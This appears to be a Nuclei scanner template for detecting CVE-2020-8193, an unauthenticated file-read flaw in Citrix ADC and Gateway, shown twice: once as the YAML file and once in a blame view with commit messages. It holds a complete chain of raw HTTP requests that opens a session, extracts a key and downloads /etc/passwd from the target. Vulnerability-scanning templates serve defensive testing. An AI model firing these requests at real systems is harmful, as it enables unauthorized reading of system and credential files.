nuclei-templates/cves/2020/CVE-2020-8193.yaml

id: CVE-2020-8193

info:
  name: Citrix unauthenticated LFI
  author: pdteam
  severity: high
  reference:
    - https://github.com/jas502n/CVE-2020-8193
    - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
  description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.
  tags: cve,cve2020,citrix,lfi

requests:
  - raw:
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/xml
        X-NITRO-USER: xpyZxwy6
        X-NITRO-PASS: xWXHUJ56

        <appfwprofile><login></login></appfwprofile>

      - |
        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close

      - |
        GET /menu/neo HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close

      - |
        GET /menu/stc HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close

      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: §randkey§

        <appfwprofile><login></login></appfwprofile>

      - |
        POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.24.0
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: §randkey§

        <clipermission></clipermission>

    cookie-reuse: true

    # Using cookie-reuse to maintain session between each request, same as browser.

    extractors:
      - type: regex
        name: randkey
        part: body
        internal: true
        regex:
          - "(?m)[0-9]{3,10}\\.[0-9]+"

    # Using rand_key as dynamic variable to make use of extractors at run time.


    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-8193`
tempalte for CVE-2020-8193 detection 2020-07-11 10:15:20 +00:00
			`info:`
			`name: Citrix unauthenticated LFI`
			`author: pdteam`
			`severity: high`
Remove \| 2021-03-16 15:19:01 +00:00			`reference:`
References and description 2021-03-16 15:08:01 +00:00			`- https://github.com/jas502n/CVE-2020-8193`
			`- http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html`
			`description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2020,citrix,lfi`
tempalte for CVE-2020-8193 detection 2020-07-11 10:15:20 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Content-Type: application/xml`
			`X-NITRO-USER: xpyZxwy6`
			`X-NITRO-PASS: xWXHUJ56`

			`<appfwprofile><login></login></appfwprofile>`

preparing for v2.1.0 release 2020-08-02 12:58:07 +00:00			`- \|`
			`GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: python-requests/2.24.0`
			`Accept: /`
			`Connection: close`

			`- \|`
			`GET /menu/neo HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: python-requests/2.24.0`
			`Accept: /`
			`Connection: close`

			`- \|`
			`GET /menu/stc HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: python-requests/2.24.0`
			`Accept: /`
			`Connection: close`

			`- \|`
			`POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: python-requests/2.24.0`
			`Accept: /`
			`Connection: close`
			`Content-Type: application/xml`
			`X-NITRO-USER: oY39DXzQ`
			`X-NITRO-PASS: ZuU9Y9c1`
Adding marker to payload 2020-11-25 20:32:20 +00:00			`rand_key: §randkey§`
preparing for v2.1.0 release 2020-08-02 12:58:07 +00:00
			`<appfwprofile><login></login></appfwprofile>`

			`- \|`
			`POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: python-requests/2.24.0`
			`Accept: /`
			`Connection: close`
			`Content-Type: application/xml`
			`X-NITRO-USER: oY39DXzQ`
			`X-NITRO-PASS: ZuU9Y9c1`
Adding marker to payload 2020-11-25 20:32:20 +00:00			`rand_key: §randkey§`
preparing for v2.1.0 release 2020-08-02 12:58:07 +00:00
			`<clipermission></clipermission>`

			`cookie-reuse: true`

			`# Using cookie-reuse to maintain session between each request, same as browser.`

			`extractors:`
			`- type: regex`
			`name: randkey`
			`part: body`
			`internal: true`
			`regex:`
			`- "(?m)[0-9]{3,10}\\.[0-9]+"`

Readme update 2020-08-02 13:12:36 +00:00			`# Using rand_key as dynamic variable to make use of extractors at run time.`
preparing for v2.1.0 release 2020-08-02 12:58:07 +00:00

tempalte for CVE-2020-8193 detection 2020-07-11 10:15:20 +00:00			`matchers:`
preparing for v2.1.0 release 2020-08-02 12:58:07 +00:00			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`